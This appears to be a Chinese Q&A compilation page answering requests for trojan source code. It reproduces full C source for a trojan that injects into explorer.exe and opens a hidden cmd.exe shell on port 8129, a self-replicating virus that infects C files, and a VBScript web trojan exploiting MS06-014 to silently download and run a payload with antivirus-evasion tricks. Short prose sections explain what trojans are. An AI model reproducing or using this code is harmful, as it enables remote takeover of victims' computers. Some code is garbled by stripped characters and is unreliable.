本文目录一览:
- 1、木马程序源代码,不是蠕虫,特洛伊那类的是最简单的,有哪位高手可提供下,感激
- 2、c语言木马源代码
- 3、网页木马代码大全
- 4、最简单的木马 源代码以及解释
- 5、木马程序是什么,在2003、XP中是什么代码
- 6、用JAVA编写的木马程序源代码
木马程序源代码,不是蠕虫,特洛伊那类的是最简单的,有哪位高手可提供下,感激
制造木马病毒代码大全2008-06-08 19:46制造木马病毒代码大全
一个简单的木马原型基础代码添加上自己的XXX,加上变态的壳,做点小修改,就可以.....
#includewinsock2.h
#pragma comment(lib,"ws2_32.lib")
#includewindows.h
#include Shlwapi.h
#pragma comment(lib,"Shlwapi.lib")
#include tlhelp32.h
#include stdio.h
#include string.h
//参数结构 ;
typedef struct _RemotePara
{
DWORD dwLoadLibrary;
DWORD dwFreeLibrary;
DWORD dwGetProcAddress;
DWORD dwGetModuleHandle;
DWORD dwWSAStartup;
DWORD dwSocket;
DWORD dwhtons;
DWORD dwbind;
DWORD dwlisten;
DWORD dwaccept;
DWORD dwsend;
DWORD dwrecv;
DWORD dwclosesocket;
DWORD dwCreateProcessA;
DWORD dwPeekNamedPipe;
DWORD dwWriteFile;
DWORD dwReadFile;
DWORD dwCloseHandle;
DWORD dwCreatePipe;
DWORD dwTerminateProcess;
DWORD dwMessageBox;char strMessageBox[12];
char winsockDll[16];
char cmd[10];
char Buff[4096];
char telnetmsg[60];
}RemotePara; // 提升应用级调试权限
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);
// 根据进程名称得到进程ID
DWORD GetPidByName(char *szName); // 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para)
{
WSADATA WSAData;
WORD nVersion;
SOCKET listenSocket;
SOCKET clientSocket;struct sockaddr_in server_addr;
struct sockaddr_in client_addr;int iAddrSize = sizeof(client_addr);SECURITY_ATTRIBUTES sa;HANDLE hReadPipe1;
HANDLE hWritePipe1;
HANDLE hReadPipe2;
HANDLE hWritePipe2;STARTUPINFO si;
PROCESS_INFORMATION ProcessInformation;
unsigned long lBytesRead = 0;typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
FARPROC Pclosesocket;
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PTerminateProcess;PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para-dwLoadLibrary;
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para-dwGetProcAddress;
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para-dwFreeLibrary;
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para-dwGetModuleHandle;LoadLibraryFunc(Para-winsockDll);PWSAStartup = (FARPROC)Para-dwWSAStartup;
PSocket = (FARPROC)Para-dwSocket;
Phtons = (FARPROC)Para-dwhtons;
Pbind = (FARPROC)Para-dwbind;
Plisten = (FARPROC)Para-dwlisten;
Paccept = (FARPROC)Para-dwaccept;
Psend = (FARPROC)Para-dwsend;
Precv = (FARPROC)Para-dwrecv;
Pclosesocket = (FARPROC)Para-dwclosesocket;
PCreateProcessA = (FARPROC)Para-dwCreateProcessA;
PPeekNamedPipe = (FARPROC)Para-dwPeekNamedPipe;
PWriteFile = (FARPROC)Para-dwWriteFile;
PReadFile = (FARPROC)Para-dwReadFile;
PCloseHandle = (FARPROC)Para-dwCloseHandle;
PCreatePipe = (FARPROC)Para-dwCreatePipe;
PTerminateProcess = (FARPROC)Para-dwTerminateProcess;
PMessageBoxA = (FARPROC)Para-dwMessageBox;nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(listenSocket == INVALID_SOCKET)return 0;server_addr.sin_family = AF_INET;
server_addr.sin_port = Phtons((unsigned short)(8129));
server_addr.sin_addr.s_addr = INADDR_ANY;if(Pbind(listenSocket, (struct sockaddr *)server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
if(Plisten(listenSocket, 5))return 0;
clientSocket = Paccept(listenSocket, (struct sockaddr *)client_addr, iAddrSize);
// Psend(clientSocket, Para-telnetmsg, 60, 0);if(!PCreatePipe(hReadPipe1,hWritePipe1,sa,0))return 0;
if(!PCreatePipe(hReadPipe2,hWritePipe2,sa,0))return 0;ZeroMemory(si,sizeof(si)); //ZeroMemory是C运行库函数,可以直接调用
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;if(!PCreateProcessA(NULL,Para-cmd,NULL,NULL,1,0,NULL,NULL,si,ProcessInformation))return 0;
while(1) {
memset(Para-Buff,0,4096);
PPeekNamedPipe(hReadPipe1,Para-Buff,4096,lBytesRead,0,0);
if(lBytesRead) {
if(!PReadFile(hReadPipe1, Para-Buff, lBytesRead, lBytesRead, 0))break;
if(!Psend(clientSocket, Para-Buff, lBytesRead, 0))break;
}else {
lBytesRead=Precv(clientSocket, Para-Buff, 4096, 0);
if(lBytesRead =0 ) break;
if(!PWriteFile(hWritePipe2, Para-Buff, lBytesRead, lBytesRead, 0))break;
}
}PCloseHandle(hWritePipe2);
PCloseHandle(hReadPipe1);
PCloseHandle(hReadPipe2);
PCloseHandle(hWritePipe1);
Pclosesocket(listenSocket);
Pclosesocket(clientSocket);// PMessageBoxA(NULL, Para-strMessageBox, Para-strMessageBox, MB_OK);return 0;
} int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
const DWORD THREADSIZE=1024*4;
DWORD byte_write;
void *pRemoteThread;
HANDLE hToken,hRemoteProcess,hThread;
HINSTANCE hKernel,hUser32,hSock;
RemotePara myRemotePara,*pRemotePara;
DWORD pID;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);// 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS
pID = GetPidByName("EXPLORER.EXE");
if(pID == 0)return 0;
hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存
pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!pRemoteThread)return 0; // 将线程执行体ThreadProc写入远程进程
if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, ThreadProc, THREADSIZE,0))return 0;ZeroMemory(myRemotePara,sizeof(RemotePara));
hKernel = LoadLibrary( "kernel32.dll");
myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile");
myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile");
myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle");
myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe");
myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess");hSock = LoadLibrary("wsock32.dll");
myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup");
myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket");
myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons");
myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind");
myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen");
myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept");
myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv");
myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send");
myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket");hUser32 = LoadLibrary("user32.dll");
myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0");
strcat(myRemotePara.winsockDll,"wsock32.dll\\0");
strcat(myRemotePara.cmd,"cmd.exe\\0");
strcat(myRemotePara.telnetmsg,"Connect Sucessful!\\n\\0"); //写进目标进程
pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
if(!pRemotePara)return 0;
if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程
hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,byte_write);
while(1) {}
FreeLibrary(hKernel);
FreeLibrary(hSock);
FreeLibrary(hUser32);
CloseHandle(hRemoteProcess);
CloseHandle(hToken);return 0;
} BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL,szPrivName,tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
}DWORD GetPidByName(char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32={0};
DWORD dwRet=0;hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;pe32.dwSize = sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap, pe32))
{
do
{
if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)
{
dwRet=pe32.th32ProcessID;
break;
}
}while (Process32Next(hProcessSnap,pe32));
}
else return 0;if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
return dwRet;
c语言木马源代码
#include stdio.h
#include dir.h
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#includestdio.h\n",out);
fputs("#includedir.h\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;ji-1;j++)
if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(ji-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(ffblk);
}
return 0;
}
严重声明:这个程序只是供C语言新手参考,开玩笑没关系,但如果用来做不法的事情,本人概不负责。还有,编病毒、木马去做违法的事情惩罚是很重的,你如果想学编程,编个简单的就好了,否则后果很严重。
网页木马代码大全
来晚了吗?……再复制一次吧……
要简洁……感觉复杂的话应该能免杀……
on error resume next '开启错误陷阱
dl = "" '定义“dl”为木马下载地址
Set df = document.createElement("object") '建立子元素
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 声明网马的clsid,这个是ms06014的
str="Microsoft.XMLHTTP" 使用XMLhttp对象
Set x = df.CreateObject(str,"") '用Adodb.Stream执行文件操作
a1="Ado" '下面这三个的作用是拆分字符串“Adodb.Stream”,躲过一些杀毒软件查杀
a2="db."
a3="Str"
a4="eam"
str1=a1a2a3a4 '合并字符串“Adodb.Stream”
str5=str1 '转移变量str1到str5
set S = df.createobject(str5,"") '执行文件操作
S.type = 1
str6="GET" '使用get方式获取木马文件
x.Open str6, dl, False '根据木马地址获取木马文件
x.Send
fname1="g0ld.com" '定义木马的文件名"g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","") '用FileSystemObjec执行文件操作,这次是写入文件
set tmp = F.GetSpecialFolder(2) '获取临时文件夹路径
fname1= F.BuildPath(tmp,fname1) '下面这些是向临时文件夹中写入木马
S.open
S.write x.responseBody
S.savetofile fname1,2 '保存木马文件
S.close '关闭连接
set Q = df.createobject("Shell.Application","") '用Shell.Application运行木马文件
Q.ShellExecute fname1,"","","open",0 '以隐藏方式运行木马
问题补充:我真想飞起给楼下一脚~~~~~~~
最简单的木马 源代码以及解释
一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
木马程序是什么,在2003、XP中是什么代码
什么是木马?
特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。
从木马的发展来看,基本上可以分为两个阶段。
最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。
而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。
所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。
鉴于木马的巨大危害性,我们将分原理篇,防御与反击篇,资料篇三部分来详细介绍木马,希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
用JAVA编写的木马程序源代码
网页木马比较好实现
其实就是JSP的木马
编写Java应用程序的木马不是很容易,但是可以用JBuilder打包成exe文件,不过运行还是要用java虚拟机的
总的来说,java不适合编写木马。由于java没有指针,所以比较适合开发大型的服务器端的程序。
如果你想知道JSP网页木马,用JSP木马为关键字搜索就行了